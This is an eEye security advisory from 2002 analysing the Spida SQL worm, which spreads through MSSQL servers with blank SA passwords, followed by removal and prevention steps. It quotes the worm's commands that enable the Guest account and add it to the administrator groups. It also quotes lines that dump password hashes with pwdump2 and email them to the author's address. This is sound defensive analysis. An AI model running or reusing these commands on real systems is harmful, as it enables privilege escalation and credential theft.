eEye Digital Security
  • Login to the eEye Business Client Portal
  • Shop for eEye Products
  • Read the eEye Blog
  • Subscribe to eEye RSS Feeds
  • Follow eEye on Twitter
  • Follow eEye of Facebook
Resources

Research Archives > Security Advisories > AL20020522

ANALYSIS: Spida or Digispid.B.Worm SQL Worm

Release Date:
5/22/2002 12:00:00 AM

Date Reported:
5/22/2002 12:00:00 AM

Severity:
High

Vendor:
Microsoft

Affected Software:
Default installations of Microsoft SQL Server

Overview:
The SQL worm (AKA: Spida, Digispid.B.Worm) infects by inserting itself into MSSQL database servers with no password protecting the SA (System Administrator) account. The worm executes commands on the vulnerable server using the "xp_cmdshell" General Extended Procedure, and the commands it executes activate and configure the Windows "Guest" account so it can be used to copy files over to the vulnerable machine via Windows file sharing. After the files have been copied over, they are "hidden" and the worm goes into a cleanup phase. It deactivates the Guest account and changes the password for the SA account.

The worm then creates a file containing details about the network interfaces, database, and Windows account password hashes. This file is emailed to ixltd@postone.com, which we are guessing is an email box created by the worm's author. Finally, the target machine begins to scan for other machines and continues the chain of infection.

Technical Details:
As mentioned before, the SQL worm spreads by inserting itself into MSSQL database servers that have no password protecting the SA (System Administrator) account. It executes commands in a command shell (cmd.exe) using the "xp_cmdshell" General Extended Procedure.

The commands the worm executes are as follows:

net user guest /active:yes
net user guest [random 4 byte lowercase alpha string]
net localgroup administrators guest /add
net group ``Domain Admins`` guest /add

This activates the Guest account, changes the password for the Guest account, and adds it into higher privilege groups.

Next, the worm "unhides" its files on the infected "attacker" machine, then it copies itself into the Windows system directory of the vulnerable MSSQL server. You will not be able to see these files normally because they are marked "hidden". You can use the "attrib" command from the command shell (cmd.exe) to unhide and delete them. The description and location of these files is listed below:

FSCAN portscanner:
%WinDir%\system32\drivers\services.exe

Used to run commands on a remote MSSQL server:
%WinDir%\system32\sqlexec.js

Command Line Emailer:
%WinDir%\system32\clemail.exe

Core worm processing script - contains functionality for scanning, backdooring, and the sending of retrieved data to the assumed author of the worm:
%WinDir%\system32\sqlprocess.js

Used for initial worm infection once a vulnerable host is identified:
%WinDir%\system32\sqlinstall.bat

Collects general information about local databases:
%WinDir%\system32\sqldir.js

Simple JavaScript interface to a command shell:
%WinDir%\system32\run.js

Timing library used by the worm:
%WinDir%\system32\timer.dll

SAM library used by pwdump.exe:
%WinDir%\system32\samdump.dll

Grabs password hashes for Windows user accounts; these are not the actual passwords, but retrieving the actual password is very possible if the existing passwords are weak:
%WinDir%\system32\pwdump2.exe

Note: %WinDir% is just an environment variable for your Windows base directory. The shell will replace this with the name of your registered Windows directory. This is usually "Winnt" or "Windows".

Next the worm will deactivate the Guest account and remove it from the Administrators and "Domain Admins" groups. After the Guest account is removed, the worm will also changed the SA account password to a random, four-byte lowercase alpha string. The worm instance on the target machine now creates a file containing various information about the server it has just infected. After the file is assembled it is mailed to the assumed author of the worm. This process is done with the following commands:

shell.Run("cmd /c ipconfig /all > send.txt", 0, true);
shell.Run("cmd /c cscript sqldir.js . sa " + WScript.Arguments(0) + " /r3s >> send.txt", 0, true);
shell.Run("cmd /c pwdump2 >> send.txt", 0, true);
shell.Run("clemail.exe -bodyfile send.txt -to ixltd@postone.com -subject SystemData-" + WScript.Arguments(0), 0, true);

Now the worm triggers the infected target machine to start infecting other machines in the same manner that it was infected.

Related Links:
Free SQL Worm Scanner from eEye Digital Security
http://www.eeye.com/html/Research/Tools/sqlworm.html

SQLSecurity.com
http://sqlsecurity.com/

Trend Micro Analysis
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=JS_SQLSPIDA.B

McAfee Analysis
http://vil.nai.com/vil/content/v_99499.htm

PWDump info
http://www.polivec.com/pwdump3.html

Protection:
Removal:
Change your MSSQL Server "SA" password immediately and disable the Windows Guest account. If you currently use the Guest account then you should change the password. You should also change passwords for any other account on an infected machine because upon infection the password hashes for each account were collected by worm and emailed to the worm's author. The passwords may have retrieved by the author or by anyone in the communication channel between him and you. ;)

Delete the following registry keys:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetDDE\ImagePath
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetDDE\Start
HKEY_LOCAL_MACHINE\software\microsoft\mssqlserver\client\connectto\dsquery

Delete the worm files:

attrib -h %WinDir%\system32\drivers\services.exe
attrib -h %WinDir%\system32\sqlexec.js
attrib -h %WinDir%\system32\clemail.exe
attrib -h %WinDir%\system32\sqlprocess.js
attrib -h %WinDir%\system32\sqlinstall.bat
attrib -h %WinDir%\system32\sqldir.js
attrib -h %WinDir%\system32\run.js
attrib -h %WinDir%\system32\timer.dll
attrib -h %WinDir%\system32\samdump.dll
attrib -h %WinDir%\system32\pwdump2.exe
del %WinDir%\system32\drivers\services.exe
del %WinDir%\system32\sqlexec.js
del %WinDir%\system32\clemail.exe
del %WinDir%\system32\sqlprocess.js
del %WinDir%\system32\sqlinstall.bat
del %WinDir%\system32\sqldir.js
del %WinDir%\system32\run.js
del %WinDir%\system32\timer.dll
del %WinDir%\system32\samdump.dll
del %WinDir%\system32\pwdump2.exe

Unregister the timer.dll used for scan and infection timing:

regsvr32 /u TIMER.DLL

Prevention:
1) Change the "SA" account password on any MSSQL database server that you administer so that it is not blank or easy to guess.

2) Get all of the latest Service Packs and Hotfixes from Microsoft to help prevent general worm infection.

Vendor Status:

Credit:
Riley Hassell

Copyright ©1998-2011 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

Next Steps

Free Trial
Test drive an eEye product
On-demand Demo
See an online product tour
One-on-one Demo
Schedule a personalized tour
Compare Products
See side-by-side features
Buy Now
Go to eEye product store
Contact | Site Map | Privacy | Website Feedback | 1.866.339.3732
© 1998 – 2012 eEye Digital Security. All rights reserved.